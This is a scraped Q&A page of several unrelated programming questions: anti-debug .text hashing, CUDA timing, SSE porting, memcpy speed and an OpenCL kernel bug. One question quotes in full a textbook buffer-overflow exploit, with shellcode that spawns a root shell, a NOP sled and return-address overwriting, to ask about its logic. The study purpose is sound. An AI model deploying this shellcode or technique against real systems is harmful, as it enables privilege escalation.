Same binary but different assembly instructions at runtime - Windows 7 - windows

For a bit of background, I was playing around with anti-debug techniques. To prevent software breakpoints, one can search at runtime for 0xCC inside a memory segment. Code example here -> https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SoftwareBreakpoints.cpp
Instead of checking for only one function, I wanted to test the whole .text section at runtime and compute the hash of the section. After some research I ended up with something like that.
int main(int argc, TCHAR* argv[])
{
HMODULE imageBase = GetModuleHandle(NULL);
PIMAGE_DOS_HEADER imageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
PIMAGE_NT_HEADERS imageHeader = (PIMAGE_NT_HEADERS)((SIZE_T)imageBase + imageDosHeader->e_lfanew);
SIZE_T base = (SIZE_T)imageBase + (SIZE_T)imageHeader->OptionalHeader.BaseOfCode;
SIZE_T end = (SIZE_T)base (SIZE_T)imageHeader->OptionalHeader.SizeOfCode;
int i = 0;
int total = 0;
while (base < end)
{
if (*((unsigned char*)base) != 0)
{
printf("ASM HEX: 0x%x \n", *((unsigned char*)base));
total += *((unsigned char*)base);
}
base++;
i++;
}
printf("i=%d\nTotal: %d\n", i, total);
return 0;
}
The code is basically adding every instruction and prints the total (also prints all the instructions but I removed it for clarity). There is only one .text/code section.
PS C:\Users\buildman\Source\Repos\Test\Debug> For ($i=1; $i -lt 10; $i++) {.\Test.exe | findstr "Total"}
Total: 124027
Total: 141202
Total: 123952
Total: 141502
Total: 125677
Total: 125677
Total: 122602
Total: 140302
Total: 140302
The question is Why is the total different each time?
From one compilation to another I understand, but I ran the same code 10 times in a row and some instructions are different... What are those added instructions, and why?
Running it in Windows 7 but compiled for v110_XP. Inside a VM.
Thank you.
Edit 1: Maybe it's because of ASLR, but isn't it supposed to be random? If the addresses were random, the sum will always be different.

#PeterCordes is right (look in the comments). It's because of ASLR, I just tested the code with ASLR Off and the sum is always the same.

Related

What is the logic behind the For Loop Condition, "for( i = 0; i < 160; i += 4 )" in exploit_notesearch.c in Hacking - The Art of Exploitation Book

I've been focused on this book for several years trying to get through it slowly but truly by understanding all of the details. However, I've come to a roadblock with a specific line of code in the exploit_notesearch.c program source file. The for loop on line 24 reads, "for(i = 0; i < 160; i += 4)".
The entire program source code block is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset = 270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if (argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // Set return address.
for (i = 0; i < 160; i += 4) // Fill buffer with return address.
*((unsigned int *) (buffer + i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
What I'm not understanding with this line of code is the specific value chosen by the author of 160 (shown in bold above). Why is the value 160? Can someone please explain the logic to me?
Going through GDB I figured out that changing the value from 160 to a lower value kept the starting location the same for the NOP sled in the buffer. However, there were less bytes written to memory. With less written, the return address of the target may or may not be overwritten since if less bytes are overwritten when writing then the repeated return address may not reach the target return address. This depends on how much the value is lowered, if I understand correctly. However, this still confuses me, as from the comment itself, it states that the loop fills the buffer with the return address. To me, this makes it seem like the value 160 fills the entire buffer, but I'm just not sure. I do not understand the logic.
I even counted the length of the shellcode (35 bytes) and added that to the length of the initial command (15 bytes not including escape character) and coming to the value of 50, adding that to 160 to result in 210, it definitely doesn't make sense to me. (210 would be beyond the allocated heap size of 200)
I guess my main question is what is the relationship between the value 160 as it is used in the loop and the size of the buffer?
Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?
Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable and *buffer variable? Couldn't we simply use one of them?
Any assistance is greatly appreciated.

Optimize Cuda Kernel time execution

I'm a learning Cuda student, and I would like to optimize the execution time of my kernel function. As a result, I realized a short program computing the difference between two pictures. So I compared the execution time between a classic CPU execution in C, and a GPU execution in Cuda C.
Here you can find the code I'm talking about:
int *imgresult_data = (int *) malloc(width*height*sizeof(int));
int size = width*height;
switch(computing_type)
{
case GPU:
HANDLE_ERROR(cudaMalloc((void**)&dev_data1, size*sizeof(unsigned char)));
HANDLE_ERROR(cudaMalloc((void**)&dev_data2, size*sizeof(unsigned char)));
HANDLE_ERROR(cudaMalloc((void**)&dev_data_res, size*sizeof(int)));
HANDLE_ERROR(cudaMemcpy(dev_data1, img1_data, size*sizeof(unsigned char), cudaMemcpyHostToDevice));
HANDLE_ERROR(cudaMemcpy(dev_data2, img2_data, size*sizeof(unsigned char), cudaMemcpyHostToDevice));
HANDLE_ERROR(cudaMemcpy(dev_data_res, imgresult_data, size*sizeof(int), cudaMemcpyHostToDevice));
float time;
cudaEvent_t start, stop;
HANDLE_ERROR( cudaEventCreate(&start) );
HANDLE_ERROR( cudaEventCreate(&stop) );
HANDLE_ERROR( cudaEventRecord(start, 0) );
for(int m = 0; m < nb_loops ; m++)
{
diff<<<height, width>>>(dev_data1, dev_data2, dev_data_res);
}
HANDLE_ERROR( cudaEventRecord(stop, 0) );
HANDLE_ERROR( cudaEventSynchronize(stop) );
HANDLE_ERROR( cudaEventElapsedTime(&time, start, stop) );
HANDLE_ERROR(cudaMemcpy(imgresult_data, dev_data_res, size*sizeof(int), cudaMemcpyDeviceToHost));
printf("Time to generate: %4.4f ms \n", time/nb_loops);
break;
case CPU:
clock_t begin = clock(), diff;
for (int z=0; z<nb_loops; z++)
{
// Apply the difference between 2 images
for (int i = 0; i < height; i++)
{
tmp = i*imgresult_pitch;
for (int j = 0; j < width; j++)
{
imgresult_data[j + tmp] = (int) img2_data[j + tmp] - (int) img1_data[j + tmp];
}
}
}
diff = clock() - begin;
float msec = diff*1000/CLOCKS_PER_SEC;
msec = msec/nb_loops;
printf("Time taken %4.4f milliseconds", msec);
break;
}
And here is my kernel function:
__global__ void diff(unsigned char *data1 ,unsigned char *data2, int *data_res)
{
int row = blockIdx.x;
int col = threadIdx.x;
int v = col + row*blockDim.x;
if (row < MAX_H && col < MAX_W)
{
data_res[v] = (int) data2[v] - (int) data1[v];
}
}
I obtained these execution time for each one
CPU: 1,3210ms
GPU: 0,3229ms
I wonder why GPU result is not as lower as it should be. I am a beginner in Cuda so please be comprehensive if there are some classic errors.
EDIT1:
Thank you for your feedback. I tried to delete the 'if' condition from the kernel but it didn't change deeply my program execution time.
However, after having install Cuda profiler, it told me that my threads weren't running concurrently. I don't understand why I have this kind of message, but it seems true because I only have a 5 or 6 times faster application with GPU than with CPU. This ratio should be greater, because each thread is supposed to process one pixel concurrently to all the other ones. If you have an idea of what I am doing wrong, it would be hepful...
Flow.
Here are two things you could do which may improve the performance of your diff kernel:
1. Let each thread do more work
In your kernel, each thread handles just a single element; but having a thread do anything already has a bunch of overhead, at the block and the thread level, including obtaining the parameters, checking the condition and doing address arithmetic. Now, you could say "Oh, but the reads and writes take much more time then that; this overhead is negligible" - but you would be ignoring the fact, that the latency of these reads and writes is hidden by the presence of many other warps which may be scheduled to do their work.
So, let each thread process more than a single element. Say, 4, as each thread can easily read 4 bytes at once into a register. Or even 8 or 16; experiment with it. Of course you'll need to adjust your grid and block parameters accordingly.
2. "Restrict" your pointers
__restrict is not part of C++, but it is supported in CUDA. It tells the compiler that accesses through different pointers passed to the function never overlap. See:
What does the restrict keyword mean in C++?
Realistic usage of the C99 'restrict' keyword?
Using it allows the CUDA compiler to apply additional optimizations, e.g. loading or storing data via non-coherent cache. Indeed, this happens with your kernel although I haven't measured the effects.
3. Consider using a "SIMD" instruction
CUDA offers this intrinsic:
__device__ ​ unsigned int __vsubss4 ( unsigned int a, unsigned int b )
Which subtracts each signed byte value in a from its corresponding one in b. If you can "live" with the result, rather than expecting a larger int variable, that could save you some of work - and go very well with increasing the number of elements per thread. In fact, it might let you increase it even further to get to the optimum.
I don't think you are measuring times correctly, memory copy is a time consuming step in GPU that you should take into account when measuring your time.
I see some details that you can test:
I suppose you are using MAX_H and MAX_H as constants, you may consider doing so using cudaMemcpyToSymbol().
Remember to sync your threads using __syncthreads(), so you don't get issues between each loop iteration.
CUDA works with warps, so block and number of threads per block work better as multiples of 8, but not larger than 512 threads per block unless your hardware supports it. Here is an example using 128 threads per block: <<<(cols*rows+127)/128,128>>>.
Remember as well to free your allocated memory in GPU and destroying your time events created.
In your kernel function you can have a single variable int v = threadIdx.x + blockIdx.x * blockDim.x .
Have you tested, beside the execution time, that your result is correct? I think you should use cudaMallocPitch() and cudaMemcpy2D() while working with arrays due to padding.
Probably there are other issues with the code, but here's what I see. The following lines in __global__ void diff are considered not optimal:
if (row < MAX_H && col < MAX_W)
{
data_res[v] = (int) data2[v] - (int) data1[v];
}
Conditional operators inside a kernel result in warp divergence. It means that if and else parts inside a warp are executed in sequence, not in parallel. Also, as you might have realized, if evaluates to false only at borders. To avoid the divergence and needless computation, split your image in two parts:
Central part where row < MAX_H && col < MAX_W is always true. Create an additional kernel for this area. if is unnecessary here.
Border areas that will use your diff kernel.
Obviously you'll have modify your code that calls the kernels.
And on a separate note:
GPU has throughput-oriented architecture, but not latency-oriented as CPU. It means CPU may be faster then CUDA when it comes to processing small amounts of data. Have you tried using large data sets?
CUDA Profiler is a very handy tool that will tell you're not optimal in the code.

Compiling SSE intrinsics in GCC gives an error

My SSE code works completely fine on Windows platform, but when I run this on Linux I am facing many issues. One amongst them is this:
It's just a sample illustration of my code:
int main(int ref, int ref_two)
{
__128i a, b;
a.m128i_u8[0] = ref;
b.m128i_u8[0] = ref_two;
.
.
.
.....
}
Error 1:
error : request for member 'm128i_u8' in something not a structure or union
In this thread it gives the solution of to use appropriate _mm_set_XXX intrinsics instead of the above method as it only works on Microsoft.
SSE intrinsics compiling MSDN code with GCC error?
I tried the above method mentioned in the thread I have replaced set instruction in my program but it is seriously affecting the performance of my application.
My code is massive and it needs to be changed at 2000 places. So I am looking for better alternative without affecting the performance of my app.
Recently I got this link from Intel, which says to use -fms-diaelect option to port it from windows to Linux.
http://software.intel.com/sites/products/documentation/doclib/iss/2013/compiler/cpp-lin/GUID-7A69898B-BDBB-4AA9-9820-E4A590945903.htm
Has anybody tried the above method? Has anybody found the solution to porting large code to Linux?
#Paul, here is my code and I have placed a timer to measure the time taken by both methods and the results were shocking.
Code 1: 115 ms (Microsoft method to access elements directly)
Code 2: 151 ms (using set instruction)
It costed me a 36 ms when i used set in my code.
NOTE: If I replace in single instruction of mine it takes 36 ms and imagine the performance degrade which I am going to get if I replace it 2000 times in my program.
That's the reason I am looking for a better alternative other than set instruction
Code 1:
__m128i array;
unsigned char* temp_src;
unsigned char* temp_dst;
for (i=0; i< 20; i++)
{
for (j=0; j< 1600; j+= 16)
{
Timerstart(&x);
array = _mm_loadu_si128 ((__m128i *)(src));
array.m128i_u8[0] = 36;
y+ = Timerstop(x);
_mm_store_si128( (__m128i *)temp_dst,array);
}
}
Code2:
__m128i array;
unsigned char* temp_src;
unsigned char* temp_dst;
for (i=0; i< 20; i++)
{
for (j=0; j< 1600; j+= 16)
{
Timerstart(&x);
array = _mm_set_epi8(*(src+15),*(src+14),*(src+13),*(src+12),
*(src+11),*(src+10),*(src+9), *(src+8),
*(src+7), *(src+6), *(src+5), *(src+4),
*(src+3), *(src+2), *(src+1), 36 );
y+ = Timerstop(x);
_mm_store_si128( (__m128i *)temp_dst,array);
}
}
You're trying to use a non-portable Microsoft-ism. Just stick to the more portable intrinsics, e.g. _mm_set_epi8:
__128i a = _mm_set_epi8(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ref);
This will work on all platforms and compilers.
If you're seeing performance issues then it's probably because you're doing something inefficient inside a loop - without seeing the actual code though it's not possible to make any specific suggestions on making the code more efficient.
EDIT
Often there are much more efficient ways of loading a vector with a combination of values such as in your example, e.g.:
#include "smmintrin.h" // SSE4.1
for (...)
{
for (...)
{
__m128i v = _mm_loadu_si128(0, (__m128i *)src); // load vector from src..src+15
v = _mm_insert_epi8(v, 0, 36); // replace element 0 with constant `36`
_mm_storeu_si128((__m128i *)dst, v); // store vector at dst..dst+15
}
}
This translates to just 3 instructions. (Note: if you can't assume SSE4.1 minimum then the _mm_insert_epi8 can be replaced with two bitwise intrinsics - this will still be much more efficient than using _mm_set_epi8).

Speed of memcpy() greatly influenced by different ways of malloc()

I wrote a program to test the speed of memcpy(). However, how memory are allocated greatly influences the speed.
CODE
#include<stdlib.h>
#include<stdio.h>
#include<sys/time.h>
void main(int argc, char *argv[]){
unsigned char * pbuff_1;
unsigned char * pbuff_2;
unsigned long iters = 1000*1000;
int type = atoi(argv[1]);
int buff_size = atoi(argv[2])*1024;
if(type == 1){
pbuff_1 = (void *)malloc(2*buff_size);
pbuff_2 = pbuff_1+buff_size;
}else{
pbuff_1 = (void *)malloc(buff_size);
pbuff_2 = (void *)malloc(buff_size);
}
for(int i = 0; i < iters; ++i){
memcpy(pbuff_2, pbuff_1, buff_size);
}
if(type == 1){
free(pbuff_1);
}else{
free(pbuff_1);
free(pbuff_2);
}
}
The OS is linux-2.6.35 and the compiler is GCC-4.4.5 with options "-std=c99 -O3".
Results on my computer(memcpy 4KB, iterate 1 million times):
time ./test.test 1 4
real 0m0.128s
user 0m0.120s
sys 0m0.000s
time ./test.test 0 4
real 0m0.422s
user 0m0.420s
sys 0m0.000s
This question is related with a previous question:
Why does the speed of memcpy() drop dramatically every 4KB?
UPDATE
The reason is related with GCC compiler, and I compiled and run this program with different versions of GCC:
GCC version--------4.1.3--------4.4.5--------4.6.3
Time Used(1)-----0m0.183s----0m0.128s----0m0.110s
Time Used(0)-----0m1.788s----0m0.422s----0m0.108s
It seems GCC is getting smarter.
The specific addresses returned by malloc are selected by the implementation and not always optimal for the using code. You already know that the speed of moving memory around depends greatly on cache and page effects.
Here, the specific pointers malloced are not known. You could print them out using printf("%p", ptr). What is known however, is that using just one malloc for two blocks surely avoids page and cache waste between the two blocks. That may already be the reason for the speed difference.

OpenCL in Xcode/OSX - Can't assign zero in kernel loop

I'm developing an accelerated component in OpenCL, using Xcode 4.5.1 and Grand Central Dispatch, guided by this tutorial.
The full kernel kept failing on the GPU, giving signal SIGABRT. I couldn't make much progress interpreting the error beyond that.
But I broke out aspects of the kernel to test, and I found something very peculiar involving assigning certain values to positions in an array within a loop.
Test scenario: give each thread a fixed range of array indices to initialize.
kernel void zero(size_t num_buckets, size_t positions_per_bucket, global int* array) {
size_t bucket_index = get_global_id(0);
if (bucket_index >= num_buckets) return;
for (size_t i = 0; i < positions_per_bucket; i++)
array[bucket_index * positions_per_bucket + i] = 0;
}
The above kernel fails. However, when I assign 1 instead of 0, the kernel succeeds (and my host code prints out the array of 1's). Based on a handful of tests on various integer values, I've only had problems with 0 and -1.
I've tried to outsmart the compiler with 1-1, (int) 0, etc, with no success. Passing zero in as a kernel argument worked though.
The assignment to zero does work outside of the context of a for loop:
array[bucket_index * positions_per_bucket] = 0;
The findings above were confirmed on two machines with different configurations. (OSX 10.7 + GeForce, OSX 10.8 + Radeon.) Furthermore, the kernel had no trouble when running on CL_DEVICE_TYPE_CPU -- it's just on the GPU.
Clearly, something ridiculous is happening, and it must be on my end, because "zero" can't be broken. Hopefully it's something simple. Thank you for your help.
Host code:
#include <stdio.h>
#include <OpenCL/OpenCL.h>
#include "zero.cl.h"
int main(int argc, const char* argv[]) {
dispatch_queue_t queue = gcl_create_dispatch_queue(CL_DEVICE_TYPE_GPU, NULL);
size_t num_buckets = 64;
size_t positions_per_bucket = 4;
cl_int* h_array = malloc(sizeof(cl_int) * num_buckets * positions_per_bucket);
cl_int* d_array = gcl_malloc(sizeof(cl_int) * num_buckets * positions_per_bucket, NULL, CL_MEM_WRITE_ONLY);
dispatch_sync(queue, ^{
cl_ndrange range = { 1, { 0 }, { num_buckets }, { 0 } };
zero_kernel(&range, num_buckets, positions_per_bucket, d_array);
gcl_memcpy(h_array, d_array, sizeof(cl_int) * num_buckets * positions_per_bucket);
});
for (size_t i = 0; i < num_buckets * positions_per_bucket; i++)
printf("%d ", h_array[i]);
printf("\n");
}
Refer to the OpenCL standard, section 6, paragraph 8 "Restrictions", bullet point k (emphasis mine):
6.8 k. Arguments to kernel functions in a program cannot be declared with the built-in scalar types bool, half, size_t, ptrdiff_t, intptr_t, and uintptr_t. [...]
The fact that your compiler even let you build the kernel at all indicates it is somewhat broken.
So you might want to fix that... but if that doesn't fix it, then it looks like a compiler bug, plain and simple (of CLC, that is, the OpenCL compiler, not your host code). There is no reason this kernel should work with any constant other than 0, -1. Did you try updating your OpenCL driver, what about trying on a different operating system (though I suppose this code is OS X only)?

Resources